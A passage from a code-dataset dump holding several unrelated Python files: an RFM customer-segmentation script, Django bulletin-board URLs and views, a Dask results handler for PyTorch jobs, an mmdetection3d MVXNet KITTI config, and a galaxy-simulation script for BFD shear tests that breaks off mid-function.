get_order_data_from_db(qry_customer_RFM)\n\n\n # Normalize RFM value and assign tiers for each dimension\n l_attrs = ['recency','frequency','monetary']\n l_attrs_ln = [attr+'_ln' for attr in l_attrs]\n df_cust_RFM_norm = df_cust_RFM.copy()\n\n print('Normalize ln(x)...')\n for idx, attr in enumerate(l_attrs):\n attr_ln = l_attrs_ln[idx]\n df_cust_RFM_norm[attr_ln] = pd.np.log(df_cust_RFM_norm[attr]+1)\n val_min, val_max = df_cust_RFM_norm[attr_ln].min(), df_cust_RFM_norm[attr_ln].max()\n val_scal = val_max - val_min\n print(attr_ln, end=':\\t')\n print(['{:.2f}'.format(val) for val in (val_min, val_max, val_scal)]) # Debug print\n df_cust_RFM_norm[attr] = df_cust_RFM_norm[attr_ln].apply(lambda x: (x - val_min) / val_scal)\n if attr[0] == 'r':\n df_cust_RFM[attr[0]+'_tier'] = df_cust_RFM_norm[attr].map(lambda nv: 'T{}'.format(int(nv*99.99//25)+1))\n else:\n df_cust_RFM[attr[0]+'_tier'] = df_cust_RFM_norm[attr].map(lambda nv: 'T{}'.format(4-int(nv*99.99//25)))\n\n # Perform K-mean clustering\n # Related link - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html\n n_center = 64 # 4x4x4 RFM matrix\n est_km = KMeans(n_clusters= n_center, random_state=666, n_jobs= -3)\n print('# of center to cluster: {}'.format(n_center), flush=True)\n print(_tstamp()+' Start K-mean clustering...', flush=True) # Debug print\n tstart = time.time()\n est_km.fit(df_cust_RFM_norm[l_attrs])\n tfinish = time.time()\n print(_tstamp()+' Done! ({:.1f} sec)'.format(tfinish-tstart), flush=True) # Debug print\n\n # Assign cluster group\n df_cust_RFM['cgroup'] = est_km.labels_+1\n df_cust_RMF_centers = pd.DataFrame(est_km.cluster_centers_, columns=l_attrs)\n df_cust_RMF_centers.head()\n\n df_cust_RMF_centers.sort_values('monetary', ascending=False)\n df_cust_RFM.sort_values('customer_id', inplace=True)\n\n # Output to csv\n csv_file = 'customer_RFM_tiers.csv'\n df_cust_RFM.to_csv(csv_file, index=False)\n print (df_cust_RFM)\n print('Saved to csv: ' + csv_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jerry-s-cheng/RFM","sub_path":"build_RFM_segmentation.py","file_name":"build_RFM_segmentation.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"74903484791","text":"from django.urls import path\n# from dajaxice.core import dajaxice_autodiscover, dajaxice_config\n# from django.contrib.staticfiles.urls import staticfiles_urlpatterns\n# from django.conf import settings\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('link', views.linkScrap, name='linkScrap'),\n path('info', views.infoScrap, name='infoScrap'),\n path('result', views.handle, name='handle')\n]\n","repo_name":"LOMFM/Py-Scrapping","sub_path":"scrapping/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8106895841","text":"\"\"\"\nInfrastructure for retrieving and logging intermediate results from pytorch training jobs.\n\nCurrently using dask pub/sub, but will create an S3 version in the future.\n\"\"\"\nimport uuid\nimport logging\nimport os\nfrom typing import List, Optional\nfrom os.path import join, exists, dirname\n\nfrom distributed.pubsub import Pub, Sub\nfrom distributed.utils import TimeoutError as DistributedTimeoutError\nfrom distributed.client import wait, FIRST_COMPLETED, Future\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass DaskResultsHandler:\n \"\"\"\n This class use Dask pubsub infra to pass intermediate results back from PyTorch\n jobs to the client.\n \"\"\"\n\n def __init__(self, pub_sub_key: Optional[str] = None):\n \"\"\"\n pub_sub_key is an arbitrary string (topic) for the pub sub channel.\n It's a good idea to change it. Sometimes old topics can get \"clogged\"\n \"\"\"\n if pub_sub_key is None:\n pub_sub_key = uuid.uuid4().hex\n self.pub_sub_key = pub_sub_key\n\n @classmethod\n def _get_all(cls, sub: Sub):\n while True:\n try:\n yield sub.get(timeout=1.0)\n except DistributedTimeoutError:\n break\n\n def _get_results(self, futures: List[Future], raise_errors: bool = True):\n sub = Sub(self.pub_sub_key)\n while True:\n for obj in self._get_all(sub):\n yield obj\n if not futures:\n break\n try:\n result = wait(futures, 0.1, FIRST_COMPLETED)\n except DistributedTimeoutError:\n continue\n\n for fut in result.done:\n try:\n fut.result()\n except Exception as e: # pylint: disable=broad-except\n logging.exception(e)\n if raise_errors:\n raise\n futures = result.not_done\n\n def process_results(\n self, prefix: str, futures: List[Future], raise_errors: bool = True\n ) -> None:\n \"\"\"\n Process the intermediate results:\n result objects will be dictionaries of the form {'path': path, 'data': data}\n As results come in, data will be written to f\"prefix/{path}\"\n\n prefix: directory where you want results to be written\n futures: list of futures for your jobs (output of dask_pytorch_ddp.dispatch.run)\n raise_errors: If any of the jobs fail, either raise an exception, or log it and continue.\n \"\"\"\n for result in self._get_results(futures, raise_errors=raise_errors):\n path = result[\"path\"]\n data = result[\"data\"]\n fpath = join(prefix, path)\n if not exists(dirname(fpath)):\n os.makedirs(dirname(fpath))\n if isinstance(data, str):\n data = data.encode(\"utf-8\")\n with open(fpath, \"wb+\") as f:\n f.write(data)\n\n def submit_result(self, path: str, data: str):\n \"\"\"\n To be used in jobs. Call this function with a path, and some data.\n Client will write {data} to a file at {path}\n \"\"\"\n pub = Pub(self.pub_sub_key)\n pub.put({\"path\": path, \"data\": data})\n","repo_name":"saturncloud/dask-pytorch-ddp","sub_path":"dask_pytorch_ddp/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"95"} +{"seq_id":"19715388979","text":"from mmengine import read_base\n\nwith read_base():\n from .._base_.schedules.cosine import *\n from .._base_.default_runtime import *\n\nfrom mmcv.transforms.loading import LoadImageFromFile\nfrom mmcv.transforms.processing import RandomResize, Resize\nfrom mmengine.dataset.dataset_wrapper import RepeatDataset\nfrom mmengine.dataset.sampler import DefaultSampler\nfrom mmengine.visualization.vis_backend import LocalVisBackend\n\nfrom mmdet3d.datasets.kitti_dataset import KittiDataset\nfrom mmdet3d.datasets.transforms.formating import Pack3DDetInputs\nfrom mmdet3d.datasets.transforms.loading import (LoadAnnotations3D,\n LoadPointsFromFile)\nfrom mmdet3d.datasets.transforms.test_time_aug import MultiScaleFlipAug3D\nfrom mmdet3d.datasets.transforms.transforms_3d import (GlobalRotScaleTrans,\n ObjectRangeFilter,\n PointShuffle,\n PointsRangeFilter,\n RandomFlip3D)\nfrom mmdet3d.evaluation.metrics.kitti_metric import KittiMetric\nfrom mmdet3d.models.backbones.second import SECOND\nfrom mmdet3d.models.data_preprocessors.data_preprocessor import \\\n Det3DDataPreprocessor\nfrom mmdet3d.models.dense_heads.anchor3d_head import Anchor3DHead\nfrom mmdet3d.models.detectors.mvx_faster_rcnn import DynamicMVXFasterRCNN\nfrom mmdet3d.models.layers.fusion_layers.point_fusion import PointFusion\nfrom mmdet3d.models.middle_encoders.sparse_encoder import SparseEncoder\nfrom mmdet3d.models.necks.second_fpn import SECONDFPN\nfrom mmdet3d.models.task_modules.anchor.anchor_3d_generator import \\\n Anchor3DRangeGenerator\nfrom mmdet3d.models.task_modules.assigners.max_3d_iou_assigner import \\\n Max3DIoUAssigner\nfrom mmdet3d.models.task_modules.coders.delta_xyzwhlr_bbox_coder import \\\n DeltaXYZWLHRBBoxCoder\nfrom mmdet3d.models.voxel_encoders.voxel_encoder import DynamicVFE\nfrom mmdet3d.structures.ops.iou3d_calculator import BboxOverlapsNearest3D\nfrom mmdet3d.visualization.local_visualizer import Det3DLocalVisualizer\n\n# model settings\nvoxel_size = [0.05, 0.05, 0.1]\npoint_cloud_range = [0, -40, -3, 70.4, 40, 1]\n\nmodel = dict(\n type=DynamicMVXFasterRCNN,\n data_preprocessor=dict(\n type=Det3DDataPreprocessor,\n voxel=True,\n voxel_type='dynamic',\n voxel_layer=dict(\n max_num_points=-1,\n point_cloud_range=point_cloud_range,\n voxel_size=voxel_size,\n max_voxels=(-1, -1)),\n mean=[102.9801, 115.9465, 122.7717],\n std=[1.0, 1.0, 1.0],\n bgr_to_rgb=False,\n pad_size_divisor=32),\n img_backbone=dict(\n type='mmdet.ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n norm_cfg=dict(type='BN', requires_grad=False),\n norm_eval=True,\n style='caffe'),\n img_neck=dict(\n type='mmdet.FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n # make the image features more stable numerically to avoid loss nan\n norm_cfg=dict(type='BN', requires_grad=False),\n num_outs=5),\n pts_voxel_encoder=dict(\n type=DynamicVFE,\n in_channels=4,\n feat_channels=[64, 64],\n with_distance=False,\n voxel_size=voxel_size,\n with_cluster_center=True,\n with_voxel_center=True,\n point_cloud_range=point_cloud_range,\n fusion_layer=dict(\n type=PointFusion,\n img_channels=256,\n pts_channels=64,\n mid_channels=128,\n out_channels=128,\n img_levels=[0, 1, 2, 3, 4],\n align_corners=False,\n activate_out=True,\n fuse_out=False)),\n pts_middle_encoder=dict(\n type=SparseEncoder,\n in_channels=128,\n sparse_shape=[41, 1600, 1408],\n order=('conv', 'norm', 'act')),\n pts_backbone=dict(\n type=SECOND,\n in_channels=256,\n layer_nums=[5, 5],\n layer_strides=[1, 2],\n out_channels=[128, 256]),\n pts_neck=dict(\n type=SECONDFPN,\n in_channels=[128, 256],\n upsample_strides=[1, 2],\n out_channels=[256, 256]),\n pts_bbox_head=dict(\n type=Anchor3DHead,\n num_classes=3,\n in_channels=512,\n feat_channels=512,\n use_direction_classifier=True,\n anchor_generator=dict(\n type=Anchor3DRangeGenerator,\n ranges=[\n [0, -40.0, -0.6, 70.4, 40.0, -0.6],\n [0, -40.0, -0.6, 70.4, 40.0, -0.6],\n [0, -40.0, -1.78, 70.4, 40.0, -1.78],\n ],\n sizes=[[0.8, 0.6, 1.73], [1.76, 0.6, 1.73], [3.9, 1.6, 1.56]],\n rotations=[0, 1.57],\n reshape_out=False),\n assigner_per_size=True,\n diff_rad_by_sin=True,\n assign_per_class=True,\n bbox_coder=dict(type=DeltaXYZWLHRBBoxCoder),\n loss_cls=dict(\n type='mmdet.FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n loss_bbox=dict(\n type='mmdet.SmoothL1Loss', beta=1.0 / 9.0, loss_weight=2.0),\n loss_dir=dict(\n type='mmdet.CrossEntropyLoss', use_sigmoid=False,\n loss_weight=0.2)),\n # model training and testing settings\n train_cfg=dict(\n pts=dict(\n assigner=[\n dict( # for Pedestrian\n type=Max3DIoUAssigner,\n iou_calculator=dict(type=BboxOverlapsNearest3D),\n pos_iou_thr=0.35,\n neg_iou_thr=0.2,\n min_pos_iou=0.2,\n ignore_iof_thr=-1),\n dict( # for Cyclist\n type=Max3DIoUAssigner,\n iou_calculator=dict(type=BboxOverlapsNearest3D),\n pos_iou_thr=0.35,\n neg_iou_thr=0.2,\n min_pos_iou=0.2,\n ignore_iof_thr=-1),\n dict( # for Car\n type=Max3DIoUAssigner,\n iou_calculator=dict(type=BboxOverlapsNearest3D),\n pos_iou_thr=0.6,\n neg_iou_thr=0.45,\n min_pos_iou=0.45,\n ignore_iof_thr=-1),\n ],\n allowed_border=0,\n pos_weight=-1,\n debug=False)),\n test_cfg=dict(\n pts=dict(\n use_rotate_nms=True,\n nms_across_levels=False,\n nms_thr=0.01,\n score_thr=0.1,\n min_bbox_size=0,\n nms_pre=100,\n max_num=50)))\n\n# dataset settings\ndataset_type = 'KittiDataset'\ndata_root = 'data/kitti/'\nclass_names = ['Pedestrian', 'Cyclist', 'Car']\nmetainfo = dict(classes=class_names)\ninput_modality = dict(use_lidar=True, use_camera=True)\nbackend_args = None\ntrain_pipeline = [\n dict(\n type=LoadPointsFromFile,\n coord_type='LIDAR',\n load_dim=4,\n use_dim=4,\n backend_args=backend_args),\n dict(type=LoadImageFromFile, backend_args=backend_args),\n dict(type=LoadAnnotations3D, with_bbox_3d=True, with_label_3d=True),\n dict(type=RandomResize, scale=[(640, 192), (2560, 768)], keep_ratio=True),\n dict(\n type=GlobalRotScaleTrans,\n rot_range=[-0.78539816, 0.78539816],\n scale_ratio_range=[0.95, 1.05],\n translation_std=[0.2, 0.2, 0.2]),\n dict(type=RandomFlip3D, flip_ratio_bev_horizontal=0.5),\n dict(type=PointsRangeFilter, point_cloud_range=point_cloud_range),\n dict(type=ObjectRangeFilter, point_cloud_range=point_cloud_range),\n dict(type=PointShuffle),\n dict(\n type=Pack3DDetInputs,\n keys=[\n 'points', 'img', 'gt_bboxes_3d', 'gt_labels_3d', 'gt_bboxes',\n 'gt_labels'\n ])\n]\ntest_pipeline = [\n dict(\n type=LoadPointsFromFile,\n coord_type='LIDAR',\n load_dim=4,\n use_dim=4,\n backend_args=backend_args),\n dict(type=LoadImageFromFile, backend_args=backend_args),\n dict(\n type=MultiScaleFlipAug3D,\n img_scale=(1280, 384),\n pts_scale_ratio=1,\n flip=False,\n transforms=[\n # Temporary solution, fix this after refactor the augtest\n dict(type=Resize, scale=0, keep_ratio=True),\n dict(\n type=GlobalRotScaleTrans,\n rot_range=[0, 0],\n scale_ratio_range=[1., 1.],\n translation_std=[0, 0, 0]),\n dict(type=RandomFlip3D),\n dict(type=PointsRangeFilter, point_cloud_range=point_cloud_range),\n ]),\n dict(type=Pack3DDetInputs, keys=['points', 'img'])\n]\nmodality = dict(use_lidar=True, use_camera=True)\ntrain_dataloader = dict(\n batch_size=2,\n num_workers=2,\n sampler=dict(type=DefaultSampler, shuffle=True),\n dataset=dict(\n type=RepeatDataset,\n times=2,\n dataset=dict(\n type=KittiDataset,\n data_root=data_root,\n modality=modality,\n ann_file='kitti_infos_train.pkl',\n data_prefix=dict(\n pts='training/velodyne_reduced', img='training/image_2'),\n pipeline=train_pipeline,\n filter_empty_gt=False,\n metainfo=metainfo,\n # we use box_type_3d='LiDAR' in kitti and nuscenes dataset\n # and box_type_3d='Depth' in sunrgbd and scannet dataset.\n box_type_3d='LiDAR',\n backend_args=backend_args)))\n\nval_dataloader = dict(\n batch_size=1,\n num_workers=1,\n sampler=dict(type=DefaultSampler, shuffle=False),\n dataset=dict(\n type=KittiDataset,\n data_root=data_root,\n modality=modality,\n ann_file='kitti_infos_val.pkl',\n data_prefix=dict(\n pts='training/velodyne_reduced', img='training/image_2'),\n pipeline=test_pipeline,\n metainfo=metainfo,\n test_mode=True,\n box_type_3d='LiDAR',\n backend_args=backend_args))\ntest_dataloader = dict(\n batch_size=1,\n num_workers=1,\n sampler=dict(type=DefaultSampler, shuffle=False),\n dataset=dict(\n type=KittiDataset,\n data_root=data_root,\n ann_file='kitti_infos_val.pkl',\n modality=modality,\n data_prefix=dict(\n pts='training/velodyne_reduced', img='training/image_2'),\n pipeline=test_pipeline,\n metainfo=metainfo,\n test_mode=True,\n box_type_3d='LiDAR',\n backend_args=backend_args))\n\noptim_wrapper.update(\n dict(\n optimizer=dict(weight_decay=0.01),\n clip_grad=dict(max_norm=35, norm_type=2),\n ))\nval_evaluator = dict(\n type=KittiMetric, ann_file='data/kitti/kitti_infos_val.pkl')\ntest_evaluator = val_evaluator\n\nvis_backends = [dict(type=LocalVisBackend)]\nvisualizer = dict(\n type=Det3DLocalVisualizer, vis_backends=vis_backends, name='visualizer')\n\n# You may need to download the model first is the network is unstable\nload_from = 'https://download.openmmlab.com/mmdetection3d/pretrain_models/mvx_faster_rcnn_detectron2-caffe_20e_coco-pretrain_gt-sample_kitti-3-class_moderate-79.3_20200207-a4a6a3c7.pth' # noqa\n","repo_name":"open-mmlab/mmdetection3d","sub_path":"mmdet3d/configs/mvxnet/mvxnet_fpn_dv_second_secfpn_8xb2_80e_kitti_3d_3class.py","file_name":"mvxnet_fpn_dv_second_secfpn_8xb2_80e_kitti_3d_3class.py","file_ext":"py","file_size_in_byte":11256,"program_lang":"python","lang":"en","doc_type":"code","stars":4289,"dataset":"github-code","pt":"92"} +{"seq_id":"70473879659","text":"\nfrom django.http import HttpResponseNotFound\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .filters import CommentFilter\nfrom .forms import *\nfrom .models import *\nfrom .utils import *\n\n\nclass BulletinList(DataMixin, ListView):\n model = Bulletin\n template_name = 'board/index.html'\n context_object_name = 'bulletins'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=\"Главная страница\")\n return dict(list(context.items()) + list(c_def.items()))\n\n\n def get_queryset(self):\n return Bulletin.objects.all()\n\n\ndef about(request):\n return render(request, 'board/about.html', {'menu': menu, 'title': 'О сайте'})\n\nclass AddBulletin(LoginRequiredMixin, DataMixin, CreateView):\n form_class = AddBulletinForm\n model = Bulletin\n template_name = 'board/addbulletin.html'\n # success_url = reverse_lazy('home')\n login_url = reverse_lazy('login')\n raise_exception = True\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=\"Добавление объявления\")\n return dict(list(context.items()) + list(c_def.items()))\n\nclass EditBulletin(LoginRequiredMixin, DataMixin, UpdateView):\n form_class = AddBulletinForm\n model = Bulletin\n template_name = 'board/addbulletin.html'\n # success_url = reverse_lazy('home')\n login_url = reverse_lazy('login')\n raise_exception = True\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=\"Редактирование объявления\")\n return dict(list(context.items()) + list(c_def.items()))\n\n\n\nclass AddReply(LoginRequiredMixin, DataMixin, CreateView):\n form_class = AddReplyForm\n model = Comment\n template_name = 'board/addreply.html'\n success_url = reverse_lazy('home')\n login_url = reverse_lazy('login')\n raise_exception = True\n\n\nclass CategoryList(DataMixin, ListView):\n model = Bulletin\n template_name = 'board/index.html'\n context_object_name = 'bulletins'\n allow_empty = False\n\n def get_queryset(self):\n return Bulletin.objects.filter(cat__id=self.kwargs['cat_id'])\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title='Категория - ' + str(context['bulletins'][0].cat),\n cat_selected=context['bulletins'][0].cat_id)\n return dict(list(context.items()) + list(c_def.items()))\n\nclass ProfileList(DataMixin, ListView):\n model = Comment\n template_name = 'board/profile.html'\n context_object_name = 'comments'\n # allow_empty = False\n\n def get_queryset(self):\n queryset = Comment.objects.filter(bulletin__user=self.request.user.id)\n self.filterset = CommentFilter(self.request.GET, queryset)\n return self.filterset.qs\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['filterset'] = self.filterset\n return context\n\n\nclass ShowBulletin(DataMixin, DetailView):\n model = Bulletin\n template_name = 'board/bulletin.html'\n context_object_name = 'bulletin'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=context['bulletin'], flag=(self.object.user==self.request.user))\n return dict(list(context.items()) + list(c_def.items()))\n\n\n\ndef pageNotFound(request, exception):\n return HttpResponseNotFound('<h1>Страница не найдена</h1>')\n\n\nclass CommentConfirm(UpdateView):\n form_class = ConfirmCommentForm\n model = Comment\n template_name = 'board/comment_confirm.html'\n success_url = reverse_lazy('profile')\n\nclass CommentDelete(DeleteView):\n model = Comment\n template_name = 'board/comment_delete.html'\n success_url = reverse_lazy('profile')\n\n\nclass NewsList(DataMixin, ListView):\n model = News\n template_name = 'board/news.html'\n context_object_name = 'news'\n\n\nclass ShowNew(DataMixin, DetailView):\n model = News\n template_name = 'board/new.html'\n context_object_name = 'new'\n\n\n\n\n\n","repo_name":"TsupkoOlga/mybb","sub_path":"mygamebb/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"42639986025","text":"#!/usr/bin/env python\n'''\ncode to run a target or template simulation\n'''\nimport sys\nimport os\nimport math\nimport logging\nimport argparse\nimport time\n\nimport yaml\nimport numpy as np\n#import matplotlib.pyplot as plt \nimport astropy.io.fits as fits\nimport bfd\nimport pdb\n\ndef install_args_and_defaults(params, args, defaults, arg_prefix=\"\"):\n '''\n For each key of the defaults dictionary, put the params value in the dictionary as\n * the value in args, if there is one - apply arg_prefix to parameter name\n * else the value already present in params stays, if there is one\n * else insert the defaults value, if it's not None\n * else do nothing\n '''\n for pname in defaults.keys():\n pval = eval('args.' + arg_prefix + pname)\n if pval is None:\n if defaults[pname] is not None and pname not in params:\n params[pname] = defaults[pname]\n else:\n params[pname] = pval\n return\n\ndef parse_input():\n '''Read command-line arguments and any specified YAML config files,\n returning dictionary of parameter values.\n '''\n parser = argparse.ArgumentParser(\n description='Simulate population of target or template galaxies.\\n'\n 'Command-line args take precedence over parameters in config files.',\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Config file names - do not get passed back to program.\n parser.add_argument('--config_file', '-c',\n help='Configuration file name(s), if any, in order of increasing precedence',\n type=str, nargs='*')\n parser.add_argument('--save_config', type=str,\n nargs='?', const=\"\", # Comes back with null string if given w/o argument\n help='File in which to save configuration. With no argument, will dump a '\n 'configuration file to stderr' ) \n parser.add_argument('--outfile', '-o', help='Output moments file', type=str)\n parser.add_argument('--logfile', '-l', help='Logfile name', type=str)\n parser.add_argument('--verbose', '-v', help='Increase logging detail', action='count')\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument('--targets', help='Make target galaxies -OR-', action='store_const', const=True)\n group.add_argument('--templates', help='Make template galaxies', action='store_const', const=True)\n \n parser.add_argument('--dir', help='Directory for files', type=str)\n parser.add_argument('--ngals', '-n', help='Number of galaxies to draw', type=int)\n parser.add_argument('--image_size', help='Pixels across postage stamps', type=int)\n parser.add_argument('--pad_factor',help='factor by which to zero pad original stamp size specified by --image_size, default=1, no padding',type=int)\n parser.add_argument('--pixel_scale', help='Sky units per pixel', type=float)\n parser.add_argument('--shear', help='Shear applied to targets', type=float, nargs=2)\n\n defaults = {'dir':\"\",\n 'outfile':None, # ??? No default for output\n 'logfile':None, # log to screen by default\n 'ngals':10,\n 'image_size':48,\n 'pad_factor':1,\n 'pixel_scale':1.,\n 'shear': [0.02, 0.0] }\n\n group = parser.add_argument_group(title='PSF',description='PSF parameters')\n group.add_argument('--psf_type', help='PSF type', type=str)\n group.add_argument('--psf_args', help='PSF construction arguments', nargs='*', type=float)\n group.add_argument('--psf_e', help='PSF ellipticity components', nargs=2, type=float)\n defaults_psf = {'type':'Moffat',\n 'args':[1.5, 3.5],\n 'e':[0., 0.02]}\n\n group = parser.add_argument_group(title='Weights',description='Weight parameters')\n group.add_argument('--wt_n', help='Weight function index', type=int)\n group.add_argument('--wt_sigma', help='Weight function sigma', type=float)\n defaults_wt = {'n':4,\n 'sigma':3.5}\n\n group = parser.add_argument_group(title='Galaxies',description='Galaxy population parameters')\n group.add_argument('--gal_sn_range', help='Approx flux moment S/N range', nargs=2, type=float)\n group.add_argument('--gal_hlr_range', help='Half-light radius range', nargs=2, type=float)\n group.add_argument('--gal_noise_var', help='Noise variance', type=float)\n group.add_argument('--gal_e_sigma', help='Intrinsic ellipticity RMS per component', type=float)\n group.add_argument('--gal_seed', help='Galaxy generator seed', type=int)\n group.add_argument('--gal_fixsersic',help='If want to fix to be only disk (1) or bulge (2) or 2d gaussian (3), default is combination (0)', type=int)\n defaults_gal = {'sn_range':[5., 25.],\n 'hlr_range':[1.5, 3.0],\n 'noise_var':100.,\n 'e_sigma':0.2,\n 'seed':0,\n 'fixsersic':0\n}\n\n\n group = parser.add_argument_group(title='Templates',description='Template replication specs')\n group.add_argument('--tmpl_target_file',\n help='Get sigma and weight info from this target table file. '\n 'Values in file take precedence over any provided in config '\n 'or command line', type=str)\n group.add_argument('--tmpl_noise_factor', help='Noise level relative to targets', type=float)\n group.add_argument('--tmpl_sn_min', help='Lower flux moment S/N cut on targets', type=float)\n group.add_argument('--tmpl_sigma_xy', help='Measurement error on xy moments', type=float)\n group.add_argument('--tmpl_sigma_flux', help='Measurement error on flux moments', type=float)\n group.add_argument('--tmpl_sigma_max', help='Maximum sigma deviation to replicate', type=float)\n group.add_argument('--tmpl_sigma_step', help='Sigma step for template replication', type=float)\n group.add_argument('--tmpl_xy_max', help='Maximum allowed centroid for replication', type=float)\n defaults_tmpl = {'target_file':None,\n 'noise_factor':0., # No noise on templates by default\n 'sigma_xy': None, # No defaults for measurement errors, must be given\n 'sigma_flux': None, # or obtained from a target_file\n 'sn_min': 5.,\n 'sigma_max':6.5,\n 'sigma_step':1.0,\n 'xy_max':2.}\n \n args = parser.parse_args()\n\n\n # Set up our master parameter dictionary\n params = {}\n # We require certain sub-dictionaries to be present\n params['PSF'] = {}\n params['WEIGHT'] = {}\n params['GALAXY'] = {}\n params['TEMPLATE'] = {}\n\n # Read YAML configuration files\n if args.config_file is not None:\n for f in args.config_file:\n params.update( yaml.load(open(f)) )\n \n # Override with any command-line options, install defaults\n install_args_and_defaults(params, args, defaults)\n install_args_and_defaults(params['PSF'], args, defaults_psf, arg_prefix='psf_')\n install_args_and_defaults(params['WEIGHT'], args, defaults_wt, arg_prefix='wt_')\n install_args_and_defaults(params['GALAXY'], args, defaults_gal, arg_prefix='gal_')\n install_args_and_defaults(params['TEMPLATE'], args, defaults_tmpl, arg_prefix='tmpl_')\n\n if args.templates is not None:\n params['make_template'] = True\n elif args.targets is not None or 'make_template' not in params:\n # Default is to make targets\n params['make_template'] = False\n \n # After all parameters are set, save to YAML if requested\n if args.save_config is not None:\n if len(args.save_config)==0:\n # Empty arg means dump to stderr and quit\n yaml.dump(params, sys.stderr)\n sys.exit(1)\n # otherwise save to file and continue\n fout = open(args.save_config, 'w')\n yaml.dump(params, fout)\n fout.close()\n\n # Set up logfile if there is one\n if args.verbose is None or args.verbose==0:\n level = logging.WARNING\n elif args.verbose ==1:\n level = logging.INFO\n elif args.verbose >=2:\n level = logging.DEBUG\n if args.logfile is None:\n # Logging to screen, set level\n logging.basicConfig(level = level)\n else:\n logging.basicConfig(filename = os.path.join(params['dir'],args.logfile),\n filemode='w',\n level = level)\n return params\n\ndef check_params(params):\n ''' Check that parameters are in range, and do any other processing\n necessary, including extracting sigma parameters from a target file\n if one was given.\n '''\n\n # Must have an outfile specified:\n if 'outfile' not in params:\n raise Exception(\"Must specify an outfile\")\n\n if np.hypot(params['shear'][0],params['shear'][1]) >= 1.:\n raise Exception('Shear cannot be >=1')\n \n if not 0 <= params['GALAXY']['fixsersic'] <= 3:\n raise Exception('Must give valid value (0-3) to fixsersic')\n\n # Get template parameters from a target file, if one is given\n if 'target_file' in params['TEMPLATE'] and params['make_template']:\n fitsfile = os.path.join(params['dir'],params['TEMPLATE']['target_file'])\n if os.path.isfile(fitsfile):\n hdu = fits.open(fitsfile)[0];\n M0 = bfd.Moment().M0 # Index for flux moment\n params['TEMPLATE']['sigma_xy'] = np.sqrt(hdu.header['COVMXMX'])\n params['TEMPLATE']['sigma_flux'] = np.sqrt(hdu.data[M0][M0])\n params['WEIGHT']['n'] = hdu.header['WT_N']\n params['WEIGHT']['sigma'] = hdu.header['WT_SIG']\n else:\n raise Exception(\"Could not access target_file \" + fitsfile)\n\n\ndef main(params):\n # Check the parameters for sanity\n check_params(params)\n template = params['make_template']\n\n # define center of arrays - 2d array\n cent = int(params['image_size']/2.)\n cent = np.array([cent,cent], dtype=float)\n \n psf = bfd.define_psf(**params['PSF'])\n psfarr = bfd.return_array(psf,**params)\n\n # create galaxy generator - shear them only for targets\n if template:\n galaxy = bfd.GalaxyGenerator(flux_range=[1.,2.], pixel_scale = params['pixel_scale'],**params['GALAXY'])\n else:\n galaxy = bfd.GalaxyGenerator(g=params['shear'],flux_range=[1.,2.],pixel_scale = params['pixel_scale'],**params['GALAXY'])\n # create weight function\n wt = bfd.KBlackmanHarris(**params['WEIGHT'])\n\n # Set up noise level\n noise_var = params['GALAXY']['noise_var']\n\n # Set flux range on galaxy generator to produce flux moments in desired range\n # And get the covariance for targets\n # set up a galaxy with S/N = 1 (F = sqrt(sigma^2))\n gal = galaxy.nominal(flux=np.sqrt(noise_var)) \n # create an image with 0 noise\n im = bfd.return_array(gal,\n noise_var = 0.0,\n use_gaussian_noise = True,\n convolve_with_psf = True,\n psf=psf,\n **params)\n kdata = bfd.simpleImage(im,cent,psfarr,\n pixel_scale=params['pixel_scale'],\n pixel_noise=np.sqrt(noise_var),\n pad_factor=params['pad_factor'])\n\n mc = bfd.MomentCalculator(kdata,wt)\n mom = mc.get_moment(0.,0.)\n cov = mc.get_covariance()\n # Flux needed to have S/N=1 on flux moment:\n # S/N_gal = b * S/N_MF\n # F/sigma = b * MF/sqrt(Cov_MF)\n # for F/Sigma = 1: b = sqrt(COV_MF)/MF\n fluxSN1 = (np.sqrt(cov[0][mom.M0,mom.M0]) / mom.even[mom.M0]) * np.sqrt(noise_var)\n # F = fluxSN1 * SN\n galaxy.flux_range = [fluxSN1*sn for sn in params['GALAXY']['sn_range']]\n\n if template:\n # Reduce or eliminate noise for templates\n if 'noise_factor' in params['TEMPLATE']:\n noise_var *= params['TEMPLATE']['noise_factor']\n else:\n noise_var = 0.\n\n # setup classes to save results\n if template:\n tab = bfd.TemplateTable(n = params['WEIGHT']['n'],\n sigma = params['WEIGHT']['sigma'],\n **params['TEMPLATE'])\n else:\n # Initialize the output table\n tab = bfd.TargetTable(n = params['WEIGHT']['n'],\n sigma = params['WEIGHT']['sigma'],\n cov=cov)\n\n\n # loop over 